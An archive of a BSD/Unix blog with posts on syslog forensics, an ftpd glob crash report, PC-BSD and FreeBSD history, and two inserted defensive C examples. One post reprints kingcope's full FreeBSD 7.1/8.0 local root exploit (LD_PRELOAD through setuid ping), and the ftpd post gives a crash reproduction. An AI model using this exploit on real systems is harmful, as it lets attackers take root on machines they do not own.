Mar 11 2010

Unix Logging

There is a wide variety of logging functions and services on UNIX. Some, such as the Solaris audit facility, are specific to one variety of UNIX. It is important that the digital forensics analyst becomes familiar with the logging deployed on the UNIX system under review. In particular, look at the syslog configuration file and the “/var/log” and “/var/run” directories, and check whether logs are forwarded to any remote log servers. Syslog is a network service, although it is most commonly run locally; the same mechanism can forward logs to a remote system.
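
As an added example (not part of the excerpt above), the following C program performs the check the paragraph recommends: it scans a syslog.conf-style file and lists every action that forwards to a remote host ("@host" or "@@host"). The configuration it reads by default is a constructed sample written to a temporary file; pass a path such as /etc/syslog.conf as the first argument to scan a real one. The function names, host names and file path are this example's own assumptions.

```c
/* Added example: find remote syslog destinations in a syslog.conf.
 * Only the classic "selector<ws>@host[:port]" syntax is handled. */
#define _XOPEN_SOURCE 700
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define HOSTLEN 128

/* Constructed sample configuration (not a real host's file). */
static const char SAMPLE_CONF[] =
    "# constructed sample syslog.conf\n"
    "*.err;kern.warning;auth.notice;mail.crit     /dev/console\n"
    "*.notice;authpriv.none;kern.debug;mail.crit  /var/log/messages\n"
    "security.*                                   /var/log/security\n"
    "auth.info;authpriv.info                      @loghost.example.net\n"
    "#*.*                                         @old-collector.example.net\n"
    "*.*                                          @@10.0.0.5:6514\n"
    "!ppp\n"
    "*.*                                          /var/log/ppp.log\n";

/* Write the sample to a temp file; fills path, returns 0 on success. */
int write_sample_conf(char *path, size_t pathlen) {
    if (pathlen < 32) return -1;
    strcpy(path, "/tmp/syslog.conf.XXXXXX");
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    size_t len = sizeof(SAMPLE_CONF) - 1;
    if (write(fd, SAMPLE_CONF, len) != (ssize_t)len) { close(fd); return -1; }
    close(fd);
    return 0;
}

/* Copy the bare host name of every remote action into out[] (at most max
 * entries).  Comment lines and program/host selector lines ("!prog",
 * "+host", "-host") are skipped.  Returns the count, or -1 if the file
 * cannot be opened. */
int remote_syslog_targets(const char *conf_path, char out[][HOSTLEN], int max) {
    FILE *fp = fopen(conf_path, "r");
    if (!fp) return -1;
    char line[512];
    int n = 0;
    while (n < max && fgets(line, sizeof line, fp)) {
        char *p = line;
        while (isspace((unsigned char)*p)) p++;
        if (*p == '\0' || *p == '#' || *p == '!' || *p == '+' || *p == '-') continue;
        /* the selector is the first field; the action follows it */
        char *action = p;
        while (*action && !isspace((unsigned char)*action)) action++;
        while (isspace((unsigned char)*action)) action++;
        if (*action != '@') continue;             /* local file, pipe, user... */
        while (*action == '@') action++;          /* drop "@" (UDP) or "@@" (TCP) */
        char *end;
        if (*action == '[') {                     /* "@[2001:db8::1]:514" */
            action++;
            end = action;
            while (*end && *end != ']') end++;
        } else {
            end = action;
            while (*end && !isspace((unsigned char)*end) && *end != ':') end++;
        }
        size_t len = (size_t)(end - action);
        if (len == 0 || len >= HOSTLEN) continue;
        memcpy(out[n], action, len);
        out[n][len] = '\0';
        n++;
    }
    fclose(fp);
    return n;
}

int main(int argc, char **argv) {
    char path[64];
    char hosts[8][HOSTLEN];
    const char *conf = argc > 1 ? argv[1] : path;  /* e.g. /etc/syslog.conf */
    if (argc <= 1 && write_sample_conf(path, sizeof path) != 0) return 1;
    int n = remote_syslog_targets(conf, hosts, 8);
    if (argc <= 1) unlink(path);
    if (n < 0) { perror(conf); return 1; }
    printf("%d remote log target(s) in %s\n", n, conf);
    for (int i = 0; i < n; i++) printf("  %s\n", hosts[i]);
    return 0;
}
```

A remote target found here means part of the evidence lives on another machine, so the analyst should also ask whether the collector was reachable (and whether it was also compromised) during the window of interest.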

Source


Mar 8 2010

FreeBSD and OpenBSD ftpd bug (not exploitable?)

FreeBSD ftpd globbing bug – null pointer dereference ?

Affected FreeBSD Releases
+-+-+-+-+-+-+-+-+-+
FreeBSD 8.0, 6.3 and 4.9

Affected OpenBSD Releases
+-+-+-+-+-+-+-+-+-+
OpenBSD 4.6

Testing Environment
+-+-+-+-+-+-+-+-+-+
FreeBSD localhost.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386

Full Description
+-+-+-+-+-+-+-+-+-+
FreeBSD (tested back to 4.9-Release) (and OpenBSD 4.6) has a bug in its ftpd when handling globbing requests.

My investigation results in this being a null pointer dereference in popen.c. I am not sure if this could be a heap overrun, but I don’t think so.

from popen.c:

    /* glob each piece */
    gargv[0] = argv[0];
    for (gargc = argc = 1; argv[argc] && gargc < (MAXGLOBARGS-1); argc++) {
        glob_t gl;
        int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

        memset(&gl, 0, sizeof(gl));
        gl.gl_matchc = MAXGLOBARGS;
        flags |= GLOB_LIMIT;
[1]     if (glob(argv[argc], flags, NULL, &gl))
            gargv[gargc++] = strdup(argv[argc]);
[2]     else
[3]         for (pop = gl.gl_pathv; *pop && gargc < (MAXGLOBARGS-1);
                 pop++)
                gargv[gargc++] = strdup(*pop);
        globfree(&gl);
    }

At [1] glob() is called. If there's a long directory name (for example "A" x 200) and a request like the one described in "How to repeat the problem" is sent to the ftpd, it crashes. My assumption is that it lands in the else clause [2]: glob doesn't fail but gives back a zeroed-out gl structure. In [3] there's then no check whether pop is NULL, and therefore *pop gets dereferenced, which is a null pointer, and the ftpd instance crashes.

Could someone please shed some light into why glob doesn't fail but
gives a zeroed out structure back?

How to repeat the problem
+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ ftp 192.168.2.11
Connected to 192.168.2.11.
220 localhost.Belkin FTP server (Version 6.00LS) ready.
Name (192.168.2.11:nr): kcope
331 Password required for kcope.
Password:
230 User kcope logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mkdir WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
257 "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW" directory created.
ftp> ls {W*/../W*/../W*/../W*/../W*/../W*/../W*/}
200 PORT command successful.
—snip—

on the other side:

—snip—
0x282261e5 in read () at read.S:3
3 RSYSCALL(read)
Current language: auto; currently asm
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0805622c in getline ()
(gdb) i r
eax            0x0          0
ecx            0x0          0
edx            0x0          0
ebx            0xbfbfd911   -1077946095
esp            0xbfbfba70   0xbfbfba70
ebp            0xbfbfcc08   0xbfbfcc08
esi            0x1          1
edi            0xbfbfcbf4   -1077949452
eip            0x805622c    0x805622c
eflags         0x10293      66195
cs             0x33         51
ss             0x3b         59
ds             0x3b         59
es             0x3b         59
fs             0x3b         59
gs             0x1b         27
(gdb) x/10i $eip
0x805622c : mov (%edx),%eax
0x805622e : setle %cl
0x8056231 : mov %ecx,%esi
0x8056233 : test %eax,%eax
0x8056235 : je 0x8056281
0x8056237 : test %cl,%cl
0x8056239 : je 0x8056281
0x805623b : mov %edx,%ebx
0x805623d : mov 0xffffee7c(%ebp),%edx
0x8056243 : lea 0xffffee90(%ebp,%edx,4),%edi
(gdb) i f
Stack level 0, frame at 0xbfbfcc10:
 eip = 0x805622c in getline; saved eip 0x805047b
 called by frame at 0xbfbfcc14
 Arglist at 0xbfbfcc08, args:
 Locals at 0xbfbfcc08, Previous frame's sp is 0xbfbfcc10
 Saved registers:
  ebx at 0xbfbfcbfc, ebp at 0xbfbfcc08, esi at 0xbfbfcc00, edi at 0xbfbfcc04, eip at 0xbfbfcc0c
(gdb)

Testing program:

---snip---

#include <stdio.h>
#include <string.h>
#include <glob.h>

#define MAXUSRARGS 100
#define MAXGLOBARGS 1000

/* Mirrors the popen.c loop above. GLOB_LIMIT and gl_matchc are FreeBSD
 * glob(3) extensions, and the loop deliberately keeps the missing NULL
 * check on gl_pathv so the crash can be reproduced. */
void do_glob() {
    glob_t gl;
    char **pop;

    char buffer[256];
    strcpy(buffer, "{A*/../A*/../A*/../A*/../A*/../A*/../A*}");

    int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
    memset(&gl, 0, sizeof(gl));
    gl.gl_matchc = MAXGLOBARGS;
    flags |= GLOB_LIMIT;
    if (glob(buffer, flags, NULL, &gl)) {
        printf("GLOB FAILED!\n");
        return;
    }
    else
        // for (pop = gl.gl_pathv; pop && *pop && 1 < (MAXGLOBARGS-1);
        for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1);
             pop++) {
            printf("glob success");
            return;
        }
    globfree(&gl);
}

int main(int argc, char **argv) {
    do_glob();
    do_glob();
    return 0;
}
---snip---

05 March 2010
/kingcope

Source
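
As an added example (this is neither kingcope's code nor FreeBSD's), here is a hardened version of the popen.c loop quoted in the post above: safe_glob_collect() checks gl.gl_pathv for NULL before walking it, so a glob() that reports success with an empty result list cannot dereference a null pointer, and it caps how many entries it copies. It is written against glibc on Linux; GLOB_LIMIT and gl_matchc are FreeBSD glob(3) extensions and are only used where the header defines them. The function names and the patterns in main() are this example's own.

```c
/* Added example: the ftpd globbing loop with the missing NULL check. */
#define _GNU_SOURCE
#include <glob.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Expand pattern into out[0..max-1] as strdup'd strings.  Returns the
 * number of entries stored, or -1 if glob() reports an error.  The caller
 * owns the strings (see free_collected). */
int safe_glob_collect(const char *pattern, char **out, int max) {
    glob_t gl;
    int flags = GLOB_BRACE | GLOB_NOCHECK | GLOB_TILDE;
    int n = 0;

    memset(&gl, 0, sizeof gl);
#ifdef GLOB_LIMIT
    gl.gl_matchc = max;           /* FreeBSD: glob() itself stops at max matches */
    flags |= GLOB_LIMIT;
#endif
    int rc = glob(pattern, flags, NULL, &gl);
    if (rc != 0) {
        globfree(&gl);            /* GLOB_NOSPACE can leave partial results behind */
        return -1;
    }
    /* The fix: rc == 0 does not guarantee gl_pathv is non-NULL, so check it
     * before the loop instead of dereferencing *gl.gl_pathv blindly. */
    if (gl.gl_pathv != NULL) {
        for (char **pop = gl.gl_pathv; *pop != NULL && n < max; pop++) {
            out[n] = strdup(*pop);
            if (out[n] == NULL) break;
            n++;
        }
    }
    globfree(&gl);                /* always freed, on every path */
    return n;
}

void free_collected(char **out, int n) {
    for (int i = 0; i < n; i++) free(out[i]);
}

int main(void) {
    char *out[8];
    /* no match + GLOB_NOCHECK: the pattern itself comes back as one entry */
    int n = safe_glob_collect("/no_such_dir_zz/*", out, 8);
    for (int i = 0; i < n; i++) printf("%s\n", out[i]);
    free_collected(out, n);
    /* a populous directory, capped at two entries by the caller */
    n = safe_glob_collect("/*", out, 2);
    printf("%d entries (capped)\n", n);
    free_collected(out, n);
    return 0;
}
```

The cap matters independently of the NULL check: the original loop bounds gargc but relies on GLOB_LIMIT to keep the result list small, whereas here the caller's limit is enforced in the loop itself, so the function behaves the same on a libc without GLOB_LIMIT.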


Feb 23 2010

PC-BSD 8.0 Released

The PC-BSD Team is pleased to announce the availability of PC-BSD 8.0 (Hubble Edition), running FreeBSD 8.0-RELEASE-P2 and KDE 4.3.5.

PC-BSD 8.0 contains a number of enhancements and improvements over the
7.x series. For a full list of changes, please refer to the changelog.
Some of the notable changes are:

* FreeBSD 8.0-RELEASE-P2
* KDE 4.3.5
* Brand new System Installer, allows the install of PC-BSD or FreeBSD
* Run in Live mode directly from DVD
* Updated Software Manager, allows browsing and installing applications directly via the GUI
* Support for 3D acceleration with NVIDIA drivers on amd64

Version 8.0 of PC-BSD is available for download from our mirrors, and as
torrent from http://www.gotbsd.net.

Download PC-BSD 8.0:

http://www.pcbsd.org/content/view/152/11/

Changelog:

http://www.pcbsd.org/content/view/151/11/

Release Notes

http://www.pcbsd.org/content/view/150/11/

Source


Feb 22 2010

FreeBSD and the GPL

The first free Unix-like operating system available on the IBM PC was 386BSD, of which Linus Torvalds said in 1993: “If 386BSD had been available when I started on Linux, Linux would probably never have happened.”

386BSD was a direct descendant of Bill Joy’s Berkeley Software Distribution, which was the core of SunOS and other proprietary Unix distributions. 386BSD and the patchkit for the port to the Intel chip formed the basis for FreeBSD, NetBSD and OpenBSD, which have carried the torch for BSD and open source Unix to this day.

Lars Wirzenius, a student friend of Linus Torvalds, recalled: “FreeBSD didn’t exist then. 386BSD did, but it wouldn’t have worked on my computer, since it required a 387 co-processor. I used SCO Xenix from fall 1991 to spring or summer of 1992, until Linux matured enough to be a usable environment for writing code.”

Alan Cox tells a similar story. When he saw the 386BSD announce he thought “Woah! – finally there is something worth running on a PC.”

The trouble was that 386BSD needed floating point hardware, and Linux didn’t. “I hadn’t got the floating point chip, which was 70 quid at the time, so I installed Linux,” he said.

386BSD was a long time coming. The first public release (Version 0.0) was on St. Patrick’s Day, 1991, and was barely functional. Most users had to wait until Bastille Day, 1992 for the first functional release (Version 0.1).

A year or two earlier, a couple of small fixes, and Linux may never have seen the light of day.

What ifs

The most popular of the BSDs is FreeBSD. FreeBSD, like the other BSDs, had a 15-year start on Linux, based as it was on BSD Unix, which had played a large part in defining the standards for operating systems and networking that have held good to the present day. For much of its early history, FreeBSD was technically superior to Linux, and it still retains an enviable reputation for reliability.

So it is interesting to speculate why Linux, and not FreeBSD, became the flag bearer, not only for free software, but for Unix-like operating systems.

BSD had been around for a long time, and Linux grew from small beginnings. Most of the early contributors to Linux and the projects that sprang from the early success of Linux, were hobbyists and students with no great history in computing, yet GNU/Linux, not FreeBSD, was adopted by the traditional Unix companies to become the universal operating system that Unix had promised to be.

Could have been a contender

FreeBSD didn’t stagnate, or lose, and is probably healthier than it ever was, big on networking devices, friendly with web hosting companies and big with Apple, but it hasn’t had the impact of Linux on the rest of the computing industry, despite an enviable record for technical excellence.

Any number of reasons can be given for this. During the period 1992-1994, when GNU/Linux was beginning to emerge as a viable option for Intel servers, the BSDs were the subject of a copyright dispute between USL and BSDi, which was indisputably a setback to uptake and development, but the BSDs bounced back from this setback and were the favoured solution for many web and ftp servers during the dotcom boom.

In 1999, “Walnut Creek CD-ROM set the world record for most bytes of network traffic processed in 24 hours by a single host: One single-processor PII box (a then-famous FreeBSD ftp server) handled 1.39 terabytes. (This burst of traffic was, ironically, occasioned by the release on that machine of Slackware 4.0.)”

Source


Feb 4 2010

Health Check: FreeBSD – “The unknown giant”

FreeBSD is the most accessible and popular of the BSDs, has code at the heart of Darwin and Apple’s OS X, and has powered some of the more successful sites on the Web, including Hotmail, Netcraft and Yahoo!, which before the rise of Google was the busiest site on the internet.

FreeBSD rose from the ashes of 386BSD, the original effort to port BSD to the Intel chip, and claims a code lineage that reaches back to Bill Joy’s Berkeley Software Distribution of the late seventies. The 386BSD port was begun in 1989 by Bill and Lynne Jolitz, and was destined to be the original free Unix-like operating system for the IBM PC. The first public release of 386BSD (Version 0.0) was on St. Patrick’s Day, 1991, accompanied by a series of articles in Dr. Dobb’s Journal, which documented the process.

The first functional release of 386BSD was Version 0.1, which was released on Bastille Day, 1992.

FreeBSD emerged in 1993, after the self-imposed task of supporting 386BSD on their own had proved too much for Bill and Lynne Jolitz. The patchkit which had been the underpinning for the BSD port to the 386 was revived and became the basis for the first FreeBSD release.

Source


Nov 30 2009

FreeBSD Local Root Exploit — 7.1, 8.0

Systems tested/affected
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN

*EXPLOIT*

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

main() {
    extern char **environ;
    environ = (char**)malloc(8096);

    environ[0] = (char*)malloc(1024);
    environ[1] = (char*)malloc(1024);
    strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

    execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void _init() {
    extern char **environ;
    environ=NULL;
    system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

Source


Nov 2 2009

Innovating Cron: Announcing Norc

Last week at Python NYC we open sourced Norc, a task management system that replaces Unix cron. At Perpetually we let anyone archive any web site on any schedule. One of the big challenges we faced early on was to create a flexible, traceable and scalable scheduling system to handle this problem. While cron is great, it’s not geared toward solving this problem: Tasks are tied to a single computer, and they’re managed independently for each host and user from the command line. In addition, with cron we’d have to build all sorts of infrastructure to handle error reporting, logging, etc. So there was a clear need for something better.

Source


Oct 30 2009

Compleat: Programmable bash completion for human beings

Compleat is an easy, declarative way to add smart tab completion for any command. It’s written in Haskell (but requires no programming knowledge).

With Compleat, you can add completion for any command just by writing a usage description and saving it in a configuration folder. The ten-line description of the android command above generates the same results as my 76-line bash function, and it’s so much easier to write and understand!

Source


Oct 30 2009

Multiple BSD printf(1) and multiple dtoa/*printf(3) vulnerabilities

printf(1) formats and prints its arguments, after the first, under control of the format. The format is a character string which contains three types of objects: plain characters, which are simply copied to standard output, character escape sequences which are converted and copied to the standard output, and format specifications, each of which causes printing of the next successive argument.

Source